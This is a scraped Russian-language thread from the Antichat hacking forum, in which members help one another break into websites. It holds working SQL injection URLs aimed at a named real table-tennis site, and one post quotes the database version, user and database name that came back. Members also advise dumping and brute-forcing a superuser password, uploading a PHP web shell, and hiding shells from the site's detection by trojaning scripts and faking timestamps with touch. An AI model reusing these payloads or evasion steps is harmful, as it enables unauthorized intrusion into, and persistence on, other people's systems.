HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16001  
Старый 29.12.2010, 15:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от rootmd  
в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер
я имел ввиду папки, которые видны из веб

Цитата:
Сообщение от Gorev  
с чего ты взял что там чмод 777 ?
спроведливый вопрос.

rootmd

это когда phpmyadmin стал показывать chmod?
 
Ответить с цитированием

  #16002  
Старый 29.12.2010, 16:12
Bo0oM
Новичок
Регистрация: 26.12.2009
Сообщений: 4
С нами: 8619130

Репутация: 5
По умолчанию

Народ, чем брутить SQl inj вида

1'+and+'1'='1

Вроде есть тулзы для брута через substring()? кинте в лс плиз
 
Ответить с цитированием

  #16003  
Старый 29.12.2010, 18:20
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
 
Ответить с цитированием

  #16004  
Старый 29.12.2010, 19:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от rootmd  
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
 
Ответить с цитированием

  #16005  
Старый 29.12.2010, 23:28
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

имеется

1. sql injection, под суперюзером

2. phpmyadmin, нормальный юзер
 
Ответить с цитированием

  #16006  
Старый 29.12.2010, 23:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от rootmd  
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер
1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
 
Ответить с цитированием

  #16007  
Старый 30.12.2010, 14:00
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

eclipse

http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat( version(),floor(rand(0)*2))having+min(0)+or+1--+

версия как бы намекае
 
Ответить с цитированием

  #16008  
Старый 30.12.2010, 14:11
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--

Version4.1.22-Max

Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net

DB db1081176_stiga_table_tennis

так что брути таблы...

upd

~d0s~ опередил )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #16009  
Старый 31.12.2010, 01:41
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами: 9746190

Репутация: 6
По умолчанию

Что за скрипт умет находить шеллы?

И что можно сделать что бы не детектил..

Заливаю на сайт шелл , на следующий день его нет.

В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
 
Ответить с цитированием

  #16010  
Старый 31.12.2010, 01:44
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

админ дебил попался значить ))

протроянь скрипты и не забудь про команду touch =)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.